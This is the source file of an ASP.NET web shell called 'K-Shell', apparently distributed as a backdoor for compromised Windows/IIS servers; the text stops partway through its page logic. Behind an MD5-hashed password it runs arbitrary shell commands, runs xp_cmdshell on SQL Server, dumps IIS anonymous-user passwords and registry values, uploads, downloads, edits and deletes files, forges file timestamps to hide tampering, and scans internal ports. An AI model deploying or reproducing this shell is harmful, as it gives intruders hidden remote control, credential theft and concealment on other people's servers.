newshell.aspx

<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ import namespace="System.Threading" %>
<%@ import namespace="System.Text" %>
<%@ import namespace="System.Security.Cryptography" %>
<%@ Import Namespace="System.Net.Sockets"%>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%@ import Namespace="Microsoft.Win32" %>
<script language="VB" runat="server">
Dim PASSWORD as string = "26d49f07ceebca39e994ca12a3b52f2d"   'Hash MD5 of password
'Here , change the default password "kikicoco" to yours
'----------------------------------------------------------------------
'-----------------      K-Shell by kikicoco VHS       -----------------
'-----------------    E-mail: duchaikhtn@gmail.com    -----------------
'-----------------      http://www.guru.net.vn      -------------------
'-----------------        http://vnsecurity.com       -----------------
'-----------------              Version 1.2          ------------------
'-----------------            Build (20080818)        -----------------
'----------- This shell base on WebAdmin2.0(beta) By lake2 ------------
'------------ and Asp.Net Security Analyzer by Dinis.cruz  ------------
'---------------------Thanks to : Hackerbinhphuoc  --------------------
'----------------------------------------------------------------------
'  Description:
'    1. This program run on ASP.NET environment,control the web directory
'    2. It looks like backdoor , but I wish you like it .
'    3. If you have some words to me , please send me a Email
'    4. This is useful security test tool on windows. I hope that!
'------------
dim url,TEMP1,TEMP2,TITLE as string
Function GetMD5(ByVal strPlain As String) As String
    Dim UE As UnicodeEncoding = New UnicodeEncoding
    Dim HashValue As Byte()
    Dim MessageBytes As Byte() = UE.GetBytes(strPlain)
    Dim md5 As MD5 = New MD5CryptoServiceProvider
    Dim strHex As String = ""
    HashValue = md5.ComputeHash(MessageBytes)
     For Each b As Byte In HashValue
    strHex += String.Format("{0:x2}", b)
    Next
    Return strHex
End Function
Sub Login_click(sender As Object, E As EventArgs)
    if GetMD5(Textbox.Text)=PASSWORD then
        session("kikicoco")=1
        session.Timeout=60
    else
        response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
    end if
End Sub
'Run w32 shell
Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long

Sub RunCmdW32(Src As Object, E As EventArgs)
    dim command
    dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
    dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
    If Request.Form("txtCommand1") = "" Then
        command = "dir c:\"
    else
        command = Request.Form("txtCommand1")
    End If
    ExecuteCommand1(command,tempFile,txtCmdFile.Text)
    OutputTempFile1(tempFile,fileObject)
    'txtCommand1.text=""
End Sub
Sub ExecuteCommand1(command As String, tempFile As String,cmdfile As String)
    Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
    Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
    Dim FailIfExists

    local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
    'local_copy_of_cmd = Local_dir+"cmd.exe"
    'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe"
    local_copy_of_cmd=cmdfile
    Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe"
    CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
    errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
    response.write(errReturn)
    thread.sleep(500)
End Sub
Sub OutputTempFile1(tempFile,oFileSys)
    On Error Resume Next
    dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
    resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
    oFile.Close
    Call oFileSys.DeleteFile(tempFile, True)
End sub
'End w32 shell
'Run WSH shell
Sub RunCmdWSH(Src As Object, E As EventArgs)
    dim command
    dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
    dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
    dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
    If Request.Form("txtcommand2") = "" Then
        command = "dir c:\"
    else
        command = Request.Form("txtcommand2")
    End If
    ExecuteCommand2(command,tempFile)
    OutputTempFile2(tempFile,fileObject)
    txtCommand2.text=""
End Sub
Function ExecuteCommand2(cmd_to_execute, tempFile)
      Dim oScript
      oScript = Server.CreateObject("WSCRIPT.SHELL")
      Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
End function
Sub OutputTempFile2(tempFile,fileObject)
    On Error Resume Next
    dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
    resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
    oFile.Close
    Call fileObject.DeleteFile(tempFile, True)
End sub
'End WSH shell

'System infor
Sub output_all_environment_variables(mode)
    Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
    Dim de As DictionaryEntry
    For Each de In  environmentVariables
    if mode="HTML" then
    response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
    else
    if mode="text"
    response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
    end if
    end if
    Next
End sub
Sub output_all_Server_variables(mode)
    dim item
    for each item in request.servervariables
    if mode="HTML" then
    response.write("<b>" + item + "</b> : ")
    response.write(request.servervariables(item))
    response.write("<br>")
    else
        if mode="text"
            response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
        end if
    end if
    next
End sub
'End sysinfor
Function Server_variables() As String
    dim item
    dim tmp As String
    tmp=""
    for each item in request.ServerVariables
        if request.servervariables(item) <> ""
        'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
        tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r"
        end if
    next
    return tmp
End function
'Begin List processes
Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
        dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
        dim fields_split, fields_item,i

        'on error resume next

        table("0","","")
        Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)

        winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
        objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)

        fields_split = split(Fields_to_Show,",")
        for each item in objProcessInfo
            tr
                Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
                if Ubound(Fields_split)>0 then
                    for i = 1 to ubound(fields_split)
                        Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))
                    next
                end if
            _tr
        next
End function
Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
        dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
        dim fields_split, fields_item,i,count
        newline
        rw("Showing the first " + cstr(MaxCount) + " Entries")
        newline
        newline
        table("1","","")
        Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
        _table
        winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
'       objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)
        objProcessInfo = winObj.InstancesOf(Wmi_Function)

        fields_split = split(Fields_to_Show,",")
        count = 0
        for each item in objProcessInfo
            count = Count + 1
            table("1","","")
            tr
                Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
                if Ubound(Fields_split)>0 then
                    for i = 1 to ubound(fields_split)
                        Surround_by_TD(item.properties_.item(fields_split(i)).value)
                    next
                end if
            _tr
            if count > MaxCount then exit for
        next
End function
'End List processes
'Begin IIS_list_Anon_Name_Pass
Sub IIS_list_Anon_Name_Pass()
        Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP

        IIsComputerObj = CreateObject("WbemScripting.SWbemLocator")             ' Create an instance of the IIsComputer object
        providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
        nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting

        Dim MaxCount = 20,Count = 0
        hr
        RW("only showing the first "+cstr(MaxCount) + " items")
        hr
        for each item in nodeObj
            response.write("<b>" + item.AppFriendlyName + " </b> -  ")
            response.write("(" + item.AppPoolId + ") ")

            response.write(item.AnonymousUserName + " : ")
            response.write(item.AnonymousUserPass)

            response.write("<br>")

            response.flush
            Count = Count +1
            If Count > MaxCount then exit for
        next
        hr
End sub
'End IIS_list_Anon_Name_Pass
Private Function CheckIsNumber(ByVal sSrc As String) As Boolean
    Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$")
      If reg.IsMatch(sSrc) Then
            Return True
      Else
            Return False
      End If
End Function

Public Function IISSpy() As String
      Dim iisinfo As String = ""
      Dim iisstart As String = ""
      Dim iisend As String = ""
      Dim iisstr As String = "IIS://localhost/W3SVC"
      Dim i As Integer = 0
      Try
            Dim mydir As New DirectoryEntry(iisstr)
            iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>"
            For Each child As DirectoryEntry In mydir.Children
                  If CheckIsNumber(child.Name.ToString()) Then
                        Dim dirstr As String = child.Name.ToString()
                        Dim tmpstr As String = ""
                        Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr)
                        Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir")
                        i = i + 1
                        iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>"
                        iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>"
                        iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>"
                        iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>"
                        iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ "?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>"
                        iisinfo += "</TR>"
                  End If
            Next
            iisend = "</TABLE>"
      Catch ex As Exception
            Return ex.Message
      End Try
      Return iisstart + iisinfo + iisend
End Function

Sub RegistryRead(Src As Object, E As EventArgs)
    Try
            Dim regkey As String = txtRegKey.Text
            Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1)
            Dim rk As RegistryKey = Nothing
            Dim buffer As Object
            Dim regstr As String = ""
            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then
                  rk = Registry.LocalMachine.OpenSubKey(subkey)
            End If
            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then
                  rk = Registry.ClassesRoot.OpenSubKey(subkey)
            End If
            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then
                  rk = Registry.CurrentUser.OpenSubKey(subkey)
            End If
            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then
                  rk = Registry.Users.OpenSubKey(subkey)
            End If
            If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then
                  rk = Registry.CurrentConfig.OpenSubKey(subkey)
            End If
            buffer = rk.GetValue(txtRegValue.Text, "NULL")
        dim tmpbyte As Byte = 0
                  lblresultReg.Text = "<br>Result : " + buffer.ToString()
      Catch ex As Exception
            Response.write(ex.Message)
      End Try
End Sub

' Begin List Web Site Home Directory Properties


' End List Web Site Home Directory Properties
Sub RunCMD(Src As Object, E As EventArgs)
    Try
    Dim kProcess As New Process()
    Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
    kProcessStartInfo.UseShellExecute = False
    kProcessStartInfo.RedirectStandardOutput = true
    kProcess.StartInfo = kProcessStartInfo
    kProcessStartInfo.Arguments="/c " & Cmd.text
    kProcess.Start()
    Dim myStreamReader As StreamReader = kProcess.StandardOutput
    Dim myString As String = myStreamReader.Readtoend()
    kProcess.Close()
    result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
    Cmd.text=""
    Catch
    result.text="This function has disabled!"
    End Try
End Sub
Sub CloneTime(Src As Object, E As EventArgs)
    existdir(time1.Text)
    existdir(time2.Text)
    Dim thisfile As FileInfo =New FileInfo(time1.Text)
    Dim thatfile As FileInfo =New FileInfo(time2.Text)
    thisfile.LastWriteTime = thatfile.LastWriteTime
    thisfile.LastAccessTime = thatfile.LastAccessTime
    thisfile.CreationTime = thatfile.CreationTime
    response.Write("<font color=""red"">Clone Time Success!</font>")
End Sub
sub Editor(Src As Object, E As EventArgs)
    dim mywrite as new streamwriter(filepath.text,false,encoding.default)
    mywrite.write(content.text)
    mywrite.close
    response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
end sub
Sub UpLoad(Src As Object, E As EventArgs)
    dim filename,loadpath as string
    filename=path.getfilename(UpFile.value)
    loadpath=request.QueryString("src") & filename
    if  file.exists(loadpath)=true then
        response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
        response.End()
    end if
    UpFile.postedfile.saveas(loadpath)
    response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
    response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
End Sub
Sub NewFD(Src As Object, E As EventArgs)
    url=request.form("src")
    if NewFile.Checked = True then
        dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
        mywrite.close
        response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
    else
        directory.createdirectory(url & NewName.Text)
        response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
    end if
End Sub
Sub del(a)
    if right(a,1)="\" then
        dim xdir as directoryinfo
        dim mydir as new DirectoryInfo(a)
        dim xfile as fileinfo
        for each xfile in mydir.getfiles()
            file.delete(a & xfile.name)
        next
        for each xdir in mydir.getdirectories()
            call del(a & xdir.name & "\")
        next
        directory.delete(a)
    else
        file.delete(a)
    end if
End Sub
Sub copydir(a,b)
    dim xdir as directoryinfo
    dim mydir as new DirectoryInfo(a)
    dim xfile as fileinfo
    for each xfile in mydir.getfiles()
        file.copy(a & "\" & xfile.name,b & xfile.name)
    next
    for each xdir in mydir.getdirectories()
        directory.createdirectory(b & path.getfilename(a & xdir.name))
        call copydir(a & xdir.name & "\",b & xdir.name & "\")
    next
End Sub
Sub xexistdir(temp,ow)
    if directory.exists(temp)=true or file.exists(temp)=true then
        if ow=0  then
            response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
        elseif ow=1 then
            del(temp)
        else
            dim d as string = session("cutboard")
            if right(d,1)="\" then
                TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
            else
                TEMP2=url & second(now) & replace(path.getfilename(d),"","")
            end if
        end if
    end if
End Sub
Sub existdir(temp)
        if  file.exists(temp)=false and directory.exists(temp)=false then
            response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
            response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
            response.End()
        end if
End Sub
Sub RunSQLCMD(Src As Object, E As EventArgs)
    Dim adoConn,strQuery,recResult,strResult
    if SqlName.Text<>"" then
        adoConn=Server.CreateObject("ADODB.Connection")
        adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
        If Sqlcmd.Text<>"" Then
            strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
            recResult = adoConn.Execute(strQuery)
            If NOT recResult.EOF Then
                Do While NOT recResult.EOF
                    strResult = strResult & chr(13) & recResult(0).value
                    recResult.MoveNext
                Loop
            End if
            recResult = Nothing
            strResult = Replace(strResult," ","&nbsp;")
            strResult = Replace(strResult,"<","&lt;")
            strResult = Replace(strResult,">","&gt;")
            resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
            SqlCMD.Text=""
         End if
        adoConn.Close
     End if
 End Sub
Sub RunSQLQUERY(Src As Object, E As EventArgs)
    Dim adoConn,strQuery,recResult,strResult
    if txtSqlName.Text<>"" then
        adoConn=Server.CreateObject("ADODB.Connection")
        adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text)
        If txtSqlcmd.Text<>"" Then
            strQuery = txtSqlcmd.Text
            recResult = adoConn.Execute(strQuery)
            If NOT recResult.EOF Then
                Do While NOT recResult.EOF
                    strResult = strResult & chr(13) & recResult(0).value
                    recResult.MoveNext
                Loop
            End if
            recResult = Nothing
            strResult = Replace(strResult," ","&nbsp;")
            strResult = Replace(strResult,"<","&lt;")
            strResult = Replace(strResult,">","&gt;")
            lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
            txtSqlCMD.Text=""
         End if
        adoConn.Close
     End if
 End Sub

Function GetStartedTime(ms)
    GetStartedTime=cint(ms/(1000*60*60))
End function
Function getIP()
    Dim strIPAddr as string
    If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
        strIPAddr = Request.ServerVariables("REMOTE_ADDR")
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
    ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
        strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
    Else
        strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    End If
    getIP = Trim(Mid(strIPAddr, 1, 30))
End Function
Function Getparentdir(nowdir)
    dim temp,k as integer
    temp=1
    k=0
    if len(nowdir)>4 then
        nowdir=left(nowdir,len(nowdir)-1)
    end if
    do while temp<>0
        k=temp+1
        temp=instr(temp,nowdir,"\")
        if temp =0 then
            exit do
        end if
        temp = temp+1
    loop
    if k<>2 then
        getparentdir=mid(nowdir,1,k-2)
    else
        getparentdir=nowdir
    end if
End function
Function Rename()
    url=request.QueryString("src")
    if file.exists(Getparentdir(url) & request.Form("name")) then
        rename=0
    else
        file.copy(url,Getparentdir(url) & request.Form("name"))
        del(url)
        rename=1
    end if
End Function
Function GetSize(temp)
    if temp < 1024 then
        GetSize=temp & " bytes"
    else
        if temp\1024 < 1024 then
            GetSize=temp\1024 & " KB"
        else
            if temp\1024\1024 < 1024 then
                GetSize=temp\1024\1024 & " MB"
            else
                GetSize=temp\1024\1024\1024 & " GB"
            end if
        end if
    end if
End Function
Sub downTheFile(thePath)
        dim stream
        stream=server.createObject("adodb.stream")
        stream.open
        stream.type=1
        stream.loadFromFile(thePath)
        response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
        response.addHeader("Content-Length",stream.Size)
        response.charset="UTF-8"
        response.contentType="application/octet-stream"
        response.binaryWrite(stream.read)
        response.flush
        stream.close
        stream=nothing
        response.End()
End Sub
'H T M L  S N I P P E T S
public sub Newline
        response.write("<BR>")
    end sub

    public sub TextNewline
        response.write(vbnewline)
    end sub

    public sub rw(text_to_print)      ' Response.write
        response.write(text_to_print)
    end sub

    public sub rw_b(text_to_print)
        rw("<b>"+text_to_print+"</b>")
    end sub

    public sub hr()
        rw("<hr>")
    end sub

    public sub ul()
        rw("<ul>")
    end sub

    public sub _ul()
        rw("</ul>")
    end sub

    public sub table(border_size,width,height)
        rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
    end sub

    public sub _table()
        rw("</table>")
    end sub

    public sub tr()
        rw("<tr>")
    end sub

    public sub _tr()
        rw("</tr>")
    end sub

    public sub td()
        rw("<td>")
    end sub

    public sub _td()
        rw("</td>")
    end sub

    public sub td_span(align,name,contents)
        rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
    end sub

    Public sub td_link(align,title,link,target)
        rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
    end sub

    Public sub link(title,link,target)
        rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
    end sub

    Public sub link_hr(title,link,target)
        rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
        hr
    end sub

    Public sub link_newline(title,link,target)
        rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
        newline
    end sub

    public sub empty_Cell(ColSpan)
        rw("<td colspan='"+cstr(colspan)+"'></td>")
    end sub

    public sub empty_row(ColSpan)
        rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
    end sub

        Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
            dim rowItem

            rowItems = split(rowItems,",")
            response.write("<tr bgcolor="+bgcolor+">")
            for each rowItem in RowItems
                response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
            next
            response.write("</tr>")

        end sub

        Public sub TR_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub


        Public sub Surround_by_TD(cellContents)
            response.write("<td>")
            response.write(cellContents)
            response.write("</td>")
        end sub

        Public sub Surround_by_TD_and_Bold(cellContents)
            response.write("<td><b>")
            response.write(cellContents)
            response.write("</b></td>")
        end sub

        Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
            response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
            response.write(cellContents)
            response.write("</b></font></td>")
        end sub
    Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
        response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
        response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
        response.write("    <tr heigth=20>")
        response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
        response.write("    </tr>")
        response.write("    <tr>")
        response.write("      <td>"+main_Cell_contents+"</td>")
        response.write("    </tr>")
        response.write("  </table>")
        response.write("</div>")
    end sub

    Public sub Create_Div_open(top,left,width,height,z_index)
        response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
    end sub


    Public sub Create_Div_close()
        response.write("</div>")
    end sub

    public sub Create_Iframe(left, top, width, height, name,src)
        rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")
        rw("    <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
            rw("</span>")
    end sub

    public sub Create_Iframe_relative(width, height, name,src)
        rw("    <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
    end sub

    public sub return_100_percent_table()
        rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
    end sub

    public sub font_size(size)
        rw("<font size="+size+">")
    end sub

    public sub end_font()
        rw("</font>")
    end sub

    public sub red(contents)
        rw("<font color=red>"+contents+"</font>")
    end sub

    public sub yellow(contents)
        rw("<font color='#FF8800'>"+contents+"</font>")
    end sub

    public sub green(contents)
        rw("<font color=green>"+contents+"</font>")
    end sub
    public sub print_var(var_name, var_value,var_description)
        if var_description<> "" Then
            rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
        else
            rw(b_(var_name)+" : " + var_value)
        end if
        newline
    end sub

' Functions

    public function br_()
        br_ = "<br>"
    end function

    public function b_(contents)
        b_ = "<b>"+ contents + "</b>"
    end function

    public function i_(contents)
        i_ = "<i>"+ contents + "</i>"
    end function

    public function li_(contents)
        li_ = "<li>"+ contents + "</li>"
    end function

    public function h1_(contents)
        h1_ = "<h1>"+ contents + "</h1>"
    end function

    public function h2_(contents)
        h2_ = "<h2>"+ contents + "</h2>"
    end function

    public function h3_(contents)
        h3_ = "<h3>"+ contents + "</h3>"
    end function

    public function big_(contents)
        big_ = "<big>"+ contents + "</big>"
    end function

    public function center_(contents)
        center_ = "<center>"+ cstr(contents) + "</center>"
    end function


    public function td_force_width_(width)
        td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) +  " border=0>"
    end function


    public function red_(contents)
        red_ = "<font color=red>"+contents+"</font>"
    end function

    public function yellow_(contents)
        yellow_ = "<font color='#FF8800'>"+contents+"</font>"
    end function

    public function green_(contents)
        green_ = "<font color=green>"+contents+"</font>"
    end function

    Public function link_(title,link,target)
        link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
    end function
'End HTML SNIPPETS

'Begin Scanner
Public Class Scanner
Public Ips As New ArrayList()
Public ports As New ArrayList()
Public succMsg As New StringBuilder()
Public ret As ListBox
Public errMsg As String = ""
Public Timeout As Integer = 3000
Public Sub start()
Dim thread As New Thread(New ThreadStart(AddressOf Me.run))
thread.Start()
thread = Nothing
End Sub

Public Sub run()
ret.Items.Clear()
For Each ip As String In Ips
For Each port As String In ports
'ret.Items.Add(ip + ":" + port);
Dim scanres As String = ""
Try
Dim tcpClient As New TcpClient()
Try
            tcpClient.Connect(ip, Int32.Parse(port))
            tcpClient.Close()
            ret.Items.Add(ip + " : " + port + " ................................. Open")
      Catch e As SocketException
            ret.Items.Add(ip + " : " + port + " ................................. Close")
End Try
tcpClient.Close()
Catch exp As SocketException
errMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.Message
End Try
Next
Next
End Sub
End Class

Public Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayList
Dim IpList As New ArrayList()
Dim IpParts1 As String() = New String(3) {}
Dim IpParts2 As String() = New String(3) {}
IpParts1 = StartIp.Split("."C)
IpParts2 = EndIP.Split("."C)
Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1
If nTime < 0 Then
Response.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "")
Return Nothing
End If
For n As Integer = 0 To nTime - 1
IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." + IpParts1(3))
Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1
IpParts1(3) = tmp.ToString()
If IpParts1(3).Equals("255") Then
tmp = Int32.Parse(IpParts1(2)) + 1
IpParts1(2) = tmp.ToString()
IpParts1(3) = "1"
End If
If IpParts1(2).Equals("255") Then
tmp = Int32.Parse(IpParts1(1)) + 1
IpParts1(1) = tmp.ToString()
IpParts1(2) = "1"
End If
If IpParts1(1).Equals("255") Then
tmp = Int32.Parse(IpParts1(0)) + 1
IpParts1(0) = tmp.ToString()
IpParts1(1) = "1"

End If
Next
Return IpList
End Function


Protected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs)
If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" Then
Response.Write("IP OR Ports Error.Check")
Return
End If
Dim StartIp As String = txtStartIP.Text
Dim EndIp As String = txtEndIP.Text
Dim ips As ArrayList = MakeIps(StartIp, EndIp)
Dim ScanPorts As New ArrayList()
Dim ports As String() = txtPorts.Text.Split(","C)
For Each port As String In ports
'Response.Write(port);
ScanPorts.Add(port)
Next
lstRet.Visible = True
Label1.Visible = True
Dim myscanner As New Scanner()
myscanner.Ips = ips
myscanner.ports = ScanPorts
myscanner.ret = Me.lstRet
myscanner.run()
End Sub

Protected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs)
txtStartIP.Text = ""
txtEndIP.Text = ""
txtPorts.Text = ""
Label1.Visible = False
lstRet.Visible = False
End Sub
'End Scanner
</script>
<%
if request.QueryString("action")="down" and session("kikicoco")=1 then
        downTheFile(request.QueryString("src"))
        response.End()
end if
Dim act as string = request.QueryString("action")
if act="cmd" then
TITLE="CMD.NET"
elseif act="cmdw32" then
TITLE="ASP.NET W32 Shell"
elseif act="cmdwsh" then
TITLE="ASP.NET WSH Shell"
elseif act="sqlrootkit" then
TITLE="SqlRootKit.NET"
elseif act="clonetime" then
TITLE="Clone Time"
elseif act="information" then
